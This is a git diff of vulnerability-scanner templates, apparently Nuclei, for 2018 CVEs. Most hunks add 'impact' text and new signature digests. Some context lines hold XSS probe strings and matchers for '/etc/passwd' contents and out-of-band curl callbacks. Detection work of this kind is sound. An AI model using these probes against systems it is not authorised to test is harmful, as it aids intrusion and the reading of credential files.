     Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207723bd630bb49b71cf54a3a551dc9e21482307b031f0ac514ca4031961d19680022100b0ec660db72bc7155f86ed7bcfbd546c3d3492b2e04432b259e42473f316f46f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022024da09cf069ad32d3257eb9913f14789d05cbaf363ae519a4b3acbb38d9a675c0221008d324f8790ef92cf7c241dcb78ee66ba725145598ddbf00003fe5199cd7ac37f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml
index e1d8eda081..54695e5b0b 100644
--- a/http/cves/2018/CVE-2018-20526.yaml
+++ b/http/cves/2018/CVE-2018-20526.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads.
   reference:
@@ -79,4 +81,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022004bad2a84f6f38bd954cfa29d073159e2125e9704320eda00e1dbbe3257319df022100cf596513de9134e4108271fa16482451b0a8441072baef9808589a583575beca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022032951a3d7081a8e60c51ef814fcd76ce0638e1e0c3f7eeb7b5e4a1359407a8ec022100e8f70a8424a1d260bd383ab1848a3ac64c066b6c1c72397b029af908d6d5a8da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml
index fe1428c0d4..61d2813e02 100644
--- a/http/cves/2018/CVE-2018-20608.yaml
+++ b/http/cves/2018/CVE-2018-20608.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: high
   description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.
+  impact: |
+    The vulnerability can lead to the exposure of sensitive information, such as server configuration details.
   remediation: |
     Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
         part: body
-# digest: 490a0046304402205832ebc124435588f9b04fb123255dc23942cab437f68ae8eeacbdcc1b89ab52022067f9dc6a87909cea15aa6aa65c96851c72bfc0023b2ff4755195fefeed84c1a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100acca841e1065eac80424e8def1a129ccc3b4fddf363a64f1386cb58c6d96aa0b022100d27c220d6af4e34d0e1a7954ddce3ee86f60630254163ade95767be8a8e77e0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml
index 78cd5315aa..62d4dbb318 100644
--- a/http/cves/2018/CVE-2018-20824.yaml
+++ b/http/cves/2018/CVE-2018-20824.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot,dwisiswant0
   severity: medium
   description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202360b94b2b66b216848ecb0bede29dfa5737e36d86988eb5f4c6d1553b54ff29022100dcff5670f067d91be209bf7cbf8b3bae15f88b03be7d0b47cc6803c106d8c16a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220788e8b452d609b9abee87332db316c894ee831deec4c0cdb03d96e5cf54a43480221008ab1f74bd609c5777471c28ac497d68400b024ec1548d6fd6ced4fa8ff69c73c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml
index 9917d207f1..7ca5e2f2e0 100644
--- a/http/cves/2018/CVE-2018-20985.yaml
+++ b/http/cves/2018/CVE-2018-20985.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
+  impact: |
+    The vulnerability allows an attacker to include local files and execute arbitrary code on the server.
   remediation: |
     Update to the latest version of WordPress Payeezy Pay plugin.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022001d2c708f81ba8dd384f6db0af7537715042a367021074a0cecd07c5bf1383b8022100e9957efc21cac2a65d489552f4a9f21279f34af85a5809aa9ec94641bc843380:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dbd48fb847c2eb29fb9848c1be51a5cc23d27982aea5bcee78b83463a37c5b2f02210090a3a1133c5be16e3c984cda446be9f1e3b197fd14e5f6d414d06cc81ff9c80c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml
index 128e4d7d61..56b0624e23 100644
--- a/http/cves/2018/CVE-2018-2392.yaml
+++ b/http/cves/2018/CVE-2018-2392.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or a complete system compromise.
   remediation: |
     Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet.
   reference:
@@ -97,4 +99,4 @@ http:
           - 200
 
 # file name - /etc/passwd
-# digest: 490a0046304402202b529dfba9944535e1c6fac8f840d3925bdfc3bc831c7a8e22de957316a471df0220501e28ec684c68c675f2b7e179e02f12f27976744fc97060330a2a8ff599dad9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100918e7178a89d5662a1c1de99610d33e7f1c08f1ba9d8a1e21f028b382d311fdc0221008e0273e060b10942dc0dadee8d8d056bbd924bba894b0eb980a1ae546ca89ac6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml
index 68f39cbd5b..befb4c1515 100644
--- a/http/cves/2018/CVE-2018-2791.yaml
+++ b/http/cves/2018/CVE-2018-2791.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot,leovalcante
   severity: high
   description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches provided by Oracle to address this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
           - '<script>alert(24)</script>'
           - 'Missing translation key'
         condition: and
-# digest: 4a0a00473045022100bba414e4836867eee72380ee93373240007176f3e68b164486fb872e76bcc94e022072f07446554ccfaeb37ffe4bec900655c1ff5d521996d35c08077229e0bbdbae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a47a0231822692b8c8ffd100a960175152c3d0458b9d5ecf6da6e9b51293e313022100f2ca4c1ef502a47623a3e49183004778188f6b7cb63603241a6873122206ab55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml
index 0fbb5d21a3..4f3393b42f 100644
--- a/http/cves/2018/CVE-2018-2894.yaml
+++ b/http/cves/2018/CVE-2018-2894.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by Oracle to mitigate this vulnerability.
   reference:
@@ -101,4 +103,4 @@ http:
         regex:
           - <keyStoreItem><id>([0-9]+)</id><name>{{randstr}}
         internal: true
-# digest: 4a0a00473045022100bc1a48cde64c1c455bfbebd906c1e9c8607dfe7a6f3873c3896be19fb688597a02201c25e695556d9373e4347589123217f107af3984c5041761dabfcc56d423c422:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206998db3294c9dd9fd3680852c6bff1c520757e539208d4b61625bf879b7eb0e2022100dd308b13744fec7e8407020794b9e9804fee1681f95bfbe4c0a793d5adb4c8a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml
index f74763966b..3af6eae2a0 100644
--- a/http/cves/2018/CVE-2018-3167.yaml
+++ b/http/cves/2018/CVE-2018-3167.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a30ebf5a5b53aa5cde5171b3dc5c131480bc3508a9696fedf4818f19bcc81be202205903f6d28ee69db2b1e39cc0e7e9dc576b5d0660c6b1b103e7381f4a67e527c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d95a9b5e71f5e7c64f21c2b86678406a40de7103a44bf5858180f9f33990a35b0220518f01b34196ba8892e57783bd3c1cfda46affcd5b14b5c905c939fd05c51fad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml
index 2451fe7c16..d151e086d0 100644
--- a/http/cves/2018/CVE-2018-3238.yaml
+++ b/http/cves/2018/CVE-2018-3238.yaml
@@ -5,6 +5,8 @@ info:
   author: leovalcante
   severity: medium
   description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patches and updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - '<script>alert(document.domain)</script>'
           - 'Variables.cs_imagedir'
         condition: and
-# digest: 490a004630440220412377dcde5875535196fec9cd81297a22787369e006a1aca9e0000ee0e8c07602206243c6a1bdc05a63e94a4f81d5da20e009c3b0be0cb481f48a176bb86ed312ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008f0fd206e311a9ef66b9aa3d18d174640069b47cae6a6bacff2c9c2c8eb32e31022031e76b65f1f535562f2e8b78c0731a1ad43509275a06a41e6156049284f21711:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml
index 4ba28b86e9..680006c433 100644
--- a/http/cves/2018/CVE-2018-3714.yaml
+++ b/http/cves/2018/CVE-2018-3714.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220338357a6418d64d5971458d6c5be75633866fa0a4db66122532061262e834e8502202500928bc64074f776493c977c602fe3a2aede3da802f9caa347c094fa1add6b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203c35e0aa6108c340008ba054db63b680c83c33ee013c7d4269c17a25149dddba022100a45adabc72c0cf6874825ad94aaba98440fd9919c1635a1b661699c583c73299:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml
index 93555d5784..7ae3b6ab26 100644
--- a/http/cves/2018/CVE-2018-3760.yaml
+++ b/http/cves/2018/CVE-2018-3760.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive files and information stored on the server.
   remediation: |
     Apply the latest security patches and updates for Ruby On Rails framework to fix the Local File Inclusion vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - "/etc/passwd is no longer under a load path: (.*?),"
         internal: true
         part: body
-# digest: 4a0a00473045022100f68dee1efd2160f786c4c5c04854fc121a107916c3e3ad51e6d2013b327ae0d80220556129b6b6dc32ae9c3499cdc81b40367c09161515a31af46a4fcb2bf5dda6d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008b054fc921825f8f85c378bdc82204c0bf3fcf0738989d6c84f80a84cb8d64420221008d639b56febef27aa5e6e302b8610ea1a2754ea8a3b8b270303c71f3c17c7f56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml
index 07720c5701..4ded6480b0 100644
--- a/http/cves/2018/CVE-2018-3810.yaml
+++ b/http/cves/2018/CVE-2018-3810.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the affected WordPress site.
   remediation: |
     Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009798e94201949511cdca5cc4849670c96ffacbb650350127f6a9ff234b4a003902205bae6a2158d2bc940b1848c5eaa775b8ed54ca3cbb0d2cefd117f26c59027a98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dbc6bf235e2c01e14ef505daec874f5714ff74efa43f6125c246a045712e2649022100f47acb8ceaa3ddc76241de8641b51b12dc20e1e0fcd4a0be9c2160b2fa41c506:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml
index 487c711812..e14c797be9 100644
--- a/http/cves/2018/CVE-2018-5230.yaml
+++ b/http/cves/2018/CVE-2018-5230.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d5a4791d0f6c87f444418ba4158235d137e284fef2cb453a8ae02766c2b82fde0220657cf66a6734d102c5de10708fea1bf3f5943320baef2a0dbde94d908daadc79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f93f1dd43c21ac773b67e9247f910dedfea76eb60341c48800a1cdd7dadf302a022061ca5454296800bb71ed525fd484ca036882fb8bf626296ba80e14921c45a7ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml
index ee3b8ca0f8..e899a019f4 100644
--- a/http/cves/2018/CVE-2018-5316.yaml
+++ b/http/cves/2018/CVE-2018-5316.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d278eb174ee08e468448d3abc2294d04fa353b929dccfa0dda3554e138aa1100022100c8def262485a9a497868f4bad17858ac953d561be675f9319e80d04a3ca29689:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022059fbf2a70efbcacf6215b5821654b6dec537c9f3e4ba8fdf9e754697e659a5e40220232055bb505d422a17fd608cf34cec92afa0080f82f500181b3664c90317f5e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml
index 36fe878617..485fa24f10 100644
--- a/http/cves/2018/CVE-2018-5715.yaml
+++ b/http/cves/2018/CVE-2018-5715.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207e5eb07bc484253dad78cf9eb42b7d484779cbc51476fdfbe559245e090225fd02200f93db42235fa0b95c09dd0d2e6008cb278561f80f7bd55f04497f26b2d1052c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b2ed6d54485a02ce2bb831797e2d6cd575fdc237b083725856248a062e2c68d402200a27090d0006bbd5acfba91d89024d7e85bc62d3c173b0bc885f6bc25395f9d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml
index 86bddf0e9b..e09b1d654e 100644
--- a/http/cves/2018/CVE-2018-6008.yaml
+++ b/http/cves/2018/CVE-2018-6008.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
   remediation: |
     Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022051709fba9b8e8208a4b6cb643a197de4b6c6bf3065666b9c577c404e334d417e02201a6966518390b12e629304cef65aed9958266f0c2621059a9ff80602636db398:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ecaf79f2169a2e4310f6ec85bea5407cd1d95abe31eaa5caf7fb1a59d501dfb022025ad5fb98943e629dbe003df0a60a818a5cc952b5c5dbee50c09ba0c2beeb3c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml
index 067a87b0eb..4c4c5092dc 100644
--- a/http/cves/2018/CVE-2018-6184.yaml
+++ b/http/cves/2018/CVE-2018-6184.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c4da44e5ddf145db57aec4bc7558f9c37221c20c30297e56c821b5f813ceb136022068fa2b8a44daed3e84338d583c9971c22796d71422a2b54fde260116b3729779:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ccb31fd1dfc4b070cb1d69cfdf61900b23c404bebf7e8a91d4501f5869c2d3000220795dad979931315ae0c8af43b92c226f946847a87f697867d431886591d8a953:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml
index 9ace5c5120..266e526eff 100644
--- a/http/cves/2018/CVE-2018-6200.yaml
+++ b/http/cves/2018/CVE-2018-6200.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c5807ffad690ea3c598c5959d3f0946b8f76f20515e5935dd4b7c7e53a84b600022100c0a058525b820b3dc3c81eabf393976b4a0f538b8b0739adf2df21172fd4fe43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200ba178f642e1a13e4565db063daabd0512305f6d3304943eb13d844b4627510602205c06bffb3fbff46a7b7aefdb5afc3a24b4a9e282186e42a1bc5b22466b75af4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml
index fcf6bfe1e6..98640eaba6 100644
--- a/http/cves/2018/CVE-2018-6530.yaml
+++ b/http/cves/2018/CVE-2018-6530.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 490a00463044022049291f3b94abe79b8d23a277922095a602ffe9ff6c0133e87c255a8b5ee8a20802200f33591fa32608de190807f87943a423645f3039bb7f514b1332616321e692b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201cf0732d58d42e575b11823ff14fe2b574cbd24475b0b3e96722ed6656b351ca022100ba46e28b391a715eedb154c3ebaf02b472f55ae46baddf67944fc7ff41a6c967:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml
index 442fa58acb..97ff12e794 100644
--- a/http/cves/2018/CVE-2018-6910.yaml
+++ b/http/cves/2018/CVE-2018-6910.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php
+  impact: |
+    An attacker can use the disclosed path information to gather intelligence for further attacks or exploit other vulnerabilities.
   remediation: |
     Apply the latest patch or upgrade to a newer version of DedeCMS to fix the path disclosure vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100974a282aeda98e6a140aae57ddccd5ddb0cc61f75cf7ac2b1f8e8db6a409a581022070ecadc5fa51406874243ec9c194696fa78978c2cb440f65b4fba635715be8e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206a472571c47a817e62c27552a5bdb70a5cf53e4119a2974ca32649e5a54ffd49022047d4906703784905b6fec6442bee5a3c4d2b1b8ec6106f1232a85d9b3fa657a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml
index 52c9a2d555..1bca7467d4 100644
--- a/http/cves/2018/CVE-2018-7251.yaml
+++ b/http/cves/2018/CVE-2018-7251.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue  in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
+  impact: |
+    An attacker can gain access to sensitive information, such as usernames, passwords, and system configuration details.
   remediation: |
     Upgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - '"message":'
           - '"trace":['
         condition: and
-# digest: 4b0a0048304602210088cc597277c48c1661b6345d339466a81892df5797a2aa6ea8d5dedbb85c5a06022100d56e6538d1a93b9924fc2509d9a7598f82edb468c0569a811afb238a54f0bae8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100afbff65cb8ccd0ad77280d8c60e3769c56fdeaf5adfaf05cdbad7ef0a4a7c5b4022100e6d8772cddeec755155d3f617ceb15a89d5adb2d4ed5e1b6a6cf2a806ad82237:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml
index 63161fc675..55b74bb209 100644
--- a/http/cves/2018/CVE-2018-7422.yaml
+++ b/http/cves/2018/CVE-2018-7422.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the system.
   remediation: |
     Update WordPress Site Editor plugin to the latest version to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a00473045022015d8d348f7c8e4108a5892ef4a62cf76cba89f149e9b7beb8bb698343dba17a1022100d2c2f45b6bc37460d7b93be9bada229929502f3f9bcbf466446c7cd2b0093bc1:922c64590222798bb761d5b6d8e72950
